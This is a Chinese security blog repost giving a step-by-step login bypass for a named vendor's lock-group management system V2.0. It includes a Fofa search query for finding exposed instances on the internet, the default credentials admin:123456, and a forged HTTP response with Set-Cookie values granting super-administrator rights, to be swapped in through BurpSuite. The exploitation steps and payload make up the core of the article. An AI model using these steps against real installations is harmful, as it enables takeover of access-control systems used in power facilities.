锁群管理系统0day复现

admin 2022年12月1日15:19:17安全文章评论46 views1005字阅读3分21秒阅读模式

一:漏洞介绍

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞详情

在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。经过测试发现,可以通杀2.0版本。

二:漏洞利用

步骤一:使用Fofa搜索以下语句并随便打开一个连接地址...尝试若口令登录(admin:123456
title=="锁群管理系统 V2.0"

锁群管理系统0day复现

锁群管理系统0day复现

锁群管理系统0day复现

步骤三:本人使用火狐浏览器在使用BurpSuite工具前先添加插件

锁群管理系统0day复现

锁群管理系统0day复现

锁群管理系统0day复现

步骤四:先开启插件再登录页面输入用户名admin并随便输入密码,开启代理抓包修改返回数据包如下...

锁群管理系统0day复现


修改之前:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30
用户名或密码不正确!
修改之后:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30

锁群管理系统0day复现

步骤四:放包之后就可以登录到后台界面中...此时操作关闭代理

锁群管理系统0day复现


原文始发于微信公众号(Hack All):锁群管理系统0day复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月1日15:19:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  锁群管理系统0day复现 http://cn-sec.com/archives/1437246.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: